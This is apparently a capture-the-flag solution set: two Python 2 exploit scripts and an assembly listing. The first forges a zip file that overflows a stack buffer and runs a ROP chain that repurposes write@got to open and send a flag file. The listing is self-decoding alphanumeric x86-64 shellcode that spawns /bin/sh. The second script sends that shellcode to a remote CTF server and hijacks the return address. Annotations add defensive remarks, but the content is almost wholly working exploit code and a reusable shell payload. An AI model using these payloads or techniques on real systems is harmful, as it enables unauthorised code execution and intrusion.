Shellcode_revenge++, Hellozip
#!/usr/bin/env python
# coding=utf8
# CTF exploit for the "hellozip" binary: forges a zip archive whose
# central-directory filename is over-long, so that reading it overruns a
# stack buffer and runs a ROP chain that opens 'flag' and copies it to stdout.
# Python 2 only (str concatenation with p32()/p16(), str.decode('hex')).
# Every address is hard-coded (0x0804xxxx), i.e. a 32-bit non-PIE target, and
# the chain patches write@got in place, so it also needs a writable GOT
# (no full RELRO). Defensive takeaway: the copy into the buffer must be
# bounded by the destination size, not by the length field read from the
# archive.
from pwn import p32, p16
pop_2 = 0x8048F9A            # pops two stack slots and returns; used to discard open()'s two args
pop_1 = 0x8048F9B            # pops one stack slot and returns
add_ptrebp_bl = 0x080488ac   # presumably `add [ebp+0x3d], bl`: every ebp value below carries a +0x3d bias
pop_ebp = 0x08048898
pop_ebx = 0x080484a1
ret = 0x8048B87
readable_addr = ret          # any mapped address; only used as a throwaway pop value
add_eax_ptrebx = 0x080492bb  # not used by the chain below
string_buf = 0x804B064       # writable scratch area where 'flag\0' is assembled one byte at a time
write_plt = 0x8048550
write_got = 0x804B030
rop_chain = (
    # I wrote a execve version of exp, but it *dropped EGID* in the server
    # whatever command it executed. Although it worked fine in my local
    # machine. I don't know why, it's really weird.
    # So I tried to do all the open-read-write stuffs in one ROP-chain.
    # The main goal is to open('flag', 0) and sendfile(1, 3, 0, 100)
    p32(pop_1) + p32(readable_addr) + # pop some corrupted stack
    # craft open() on write_got
    # I could just find the gadget to ADD byte by byte. It's add_ptrebp_bl, go
    # check about that.
    # Adds 0x80 to byte 0 and 0xfc to byte 1 of the resolved write() pointer so
    # that write@got ends up pointing at open(). The deltas encode the
    # write->open distance in the remote libc build, not anything in this binary.
    p32(pop_ebx) + p32(0x80) +
    p32(pop_ebp) + p32(write_got + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(0xfc) +
    p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    # prepare 'flag' string
    # Each step *adds* one character into a byte of string_buf, so this only
    # yields 'flag' if those bytes start out as zero (assumed, not checked).
    # The final step adds 0 for the terminator, which is a no-op for the
    # same reason.
    p32(pop_ebx) + p32(ord('f')) +
    p32(pop_ebp) + p32(string_buf + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('l')) +
    p32(pop_ebp) + p32(string_buf + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('a')) +
    p32(pop_ebp) + p32(string_buf + 2 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('g')) +
    p32(pop_ebp) + p32(string_buf + 3 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('\x00')) +
    p32(pop_ebp) + p32(string_buf + 4 + 0x3d) +
    p32(add_ptrebp_bl) +
    # now open('flag', 0), and the returned file descriptor should be 3
    # (0-2 are stdin/stdout/stderr; assumes the program holds no other fd).
    # pop_2 is the return address, so the two arguments are popped off the
    # stack before the chain continues.
    p32(write_plt) + p32(pop_2) + p32(string_buf) + p32(0) +
    # craft sendfile() on write_got. FYI, it's open() in write_got now.
    # Same byte-wise patch again, now adding the open->sendfile distance.
    p32(pop_ebx) + p32(0x50) +
    p32(pop_ebp) + p32(write_got + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(0x7b) +
    p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    # maybe a carry bit will be triggered in previous operation, about
    # 50% possibility. It's okay to ignore that.
    # finally sendfile(1, 3, 0, 100)
    # 0xdeadbeef is the return address of that call; it is never meant to be
    # executed -- the process is expected to crash once the flag has been sent.
    p32(write_plt) + p32(0xdeadbeef) + p32(1) + p32(3) + p32(0) + p32(100)
)
# 276 bytes of filler presumably reach the saved return address; the chain
# starts right after it.
payload = '\x00' * 276 + rop_chain
# Create template.zip with:
# with ZipFile('template.zip', 'w') as f:
#     f.write('emptyfile', 'a')
# Resulting 100-byte layout: local file header plus the 1-byte name 'a' at
# 0x00-0x1e, central-directory header at 0x1f (its 2-byte filename-length
# field is at 0x1f + 0x1c = 0x3b and its name 'a' at 0x4d), and the
# end-of-central-directory record at 0x4e.
template_zip_buf = '504b0304140000000000517a904b0000000000000000000000000100000061504b01021403140000000000517a904b000000000000000000000000010000000000000000000000a4810000000061504b050600000000010001002f0000001f0000000000'.decode('hex')
# Splice: keep everything up to the central-directory name length, replace
# that length with len(payload), keep the rest of that header (0x3d:0x4d),
# put the payload where the name 'a' was, then append the untouched EOCD.
expzip_buf = \
    template_zip_buf[:0x3b] + \
    p16(len(payload)) + \
    template_zip_buf[0x3d:0x4d] + \
    payload + \
    template_zip_buf[0x4e:]
# NOTE(review): 'wb' would be the portable mode for binary output; 'w' works
# here only because Python 2 on POSIX does no newline translation.
with open('exp.zip', 'w') as f:
    f.write(expzip_buf)
# Now scp exp.zip to the /tmp dir in server,
# and run 'cd /home/hellozip; ./hellozip < /tmp/exp.zip'
# Slightly modified from: https://www.exploit-db.com/exploits/35205/
# Assembled (56 bytes):
# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as binsh.s -o binsh.o ; strings binsh.o
#
# x86-64 alphanumeric shellcode. Every byte of the assembled form is
# printable, which is what lets it pass an input filter that only rejects
# non-printable characters. Only the first 44 bytes are real instructions:
# they XOR-decode the trailing "encoded_code"/"encoded_data" bytes in place,
# so a static disassembly of the stored bytes never shows the pops and the
# syscall that actually execute -- detection has to work on the decoded form
# (or on the execve itself). Running it at all requires the input buffer it
# lands in to be executable; a non-executable data region stops it outright.
.section .data
.section .text
.globl _start
_start:
    push $0x2f2f412f
    pop %rax
    xor $0x2f4f5150, %rax # RAX becomes 0x60107f. it's close to the buffer of 'name'. use it as the base of shellcode
    # 0x2f2f412f ^ 0x2f4f5150 = 0x0060107f. With the name buffer at 0x6010C0
    # (see the companion exploit script), 0x60107f + 0x6d = 0x6010EC, which is
    # offset 0x2c into the shellcode -- exactly where encoded_code starts.
    push %rax
    pop %rsi # Make use of '^', AKA pop %rsi
prepare_key: # "hj5XVX"
    # put the xor key into %eax
    push $0x5658356a # 'hj5XV' pushed backwards because x86 stack.
    pop %rax # 'X'
decode_encoded_code: # "1Fm"  (the earlier "1FK"/0x4b variant is kept below, commented out)
    #xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded
    xor %eax, 0x6d(%rsi) # '1Fm' encoded_code ; pops & syscall decoded
decode_encoded_data: # "1FuH3Fq"
    xor %eax, 0x75(%rsi) # '1Fu' encoded_data + 4 ; "/sh\0" decoded
    xor 0x71(%rsi), %rax # 'H3Fq' encoded_data ; "/bin/sh\0" now in %rax
begin_stack_setup: # "PT"
    push %rax # 'P' push "/bin/sh\0"
    push %rsp # 'T' push pointer to /bin/sh
zero_rax: # "j0X40"
    # xor %rax, %rax
    push $0x30 # 'j0'
    pop %rax # 'X'
    xor $0x30, %al # '40' %rax is NULL
end_stack_setup: # "PP"
    push %rax # 'P' push NULL
    push %rax # 'P' push NULL
mov_3b_al: # "4u4N"
    # mov $0x3b, %al
    xor $0x75, %al # '4u'
    xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b
    # this is for syscall ^
begin_stack_run: # "Z"
    pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL
encoded_code: # "4jWS"
    # 0x34 0x6a 0x57 0x53
    # AFTER XOR MAGIC (each byte xored with the key bytes 6a 35 58 56):
    .byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL
    .byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
    .byte 0x57 # "\x0f"
    .byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
    # syscall(%rax) = function(%rdi,%rsi,%rdx);
    # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
encoded_data: # "EW18EF0V" turns into "/bin/sh\0"
    # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
    # AFTER XOR MAGIC (same key, applied once per 4-byte half):
    .byte 0x45 # /
    .byte 0x57 # b
    .byte 0x31 # i
    .byte 0x38 # n
    .byte 0x45 # /
    .byte 0x46 # s
    .byte 0x30 # h
    .byte 0x56 # \0
#!/usr/bin/env python
# coding=utf8
# CTF exploit for "shellcode_revenge++": sends the alphanumeric shellcode as
# the 'name', then overflows the second input with 24 bytes of filler and the
# name buffer's address (presumably landing on the saved return address) so
# execution continues inside the buffer. Python 2 only (print statement,
# str payloads). The companion assembly listing derives its base 0x60107f
# from the buffer address 0x6010C0 used here.
from pwn import remote, process, p64, asm
# p = process('./shellcode_revenge++')
p = remote('shellcode-revenge.grandprix.whitehatvn.com', 10203)
shellcode = 'h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V'  # 56 printable bytes
shellcode = shellcode.ljust(80, 'G') # append nop
# (the 'G' filler sits after the decoder's data bytes; on a successful execve
# it is never executed)
print shellcode
name_buf = 0x6010C0   # fixed address of the name buffer (non-PIE target)
payload = 'a' * 24 + p64(name_buf)
p.recvuntil('What\'s your name,')
p.send(shellcode)
p.recvuntil('messege for me!')
p.sendline(payload)
p.interactive()